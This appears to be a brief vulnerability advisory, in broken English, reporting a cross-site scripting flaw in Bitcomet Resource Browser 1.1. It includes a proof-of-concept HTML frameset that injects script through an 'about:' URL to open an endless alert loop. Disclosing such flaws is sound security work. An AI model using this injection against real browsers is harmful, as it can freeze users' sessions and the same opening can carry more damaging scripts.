Bitcomet Resource Browser version 1.1 is susceptible to cross site scripting attacks.
bb253b72304239075c116c21c56021bc3916ca6b332c5c9d8c7f1e98166a6160
The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity.
Create an html file and paste the following code
<html>
<frameset rows="100%">
<frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>">
</frameset>
</html>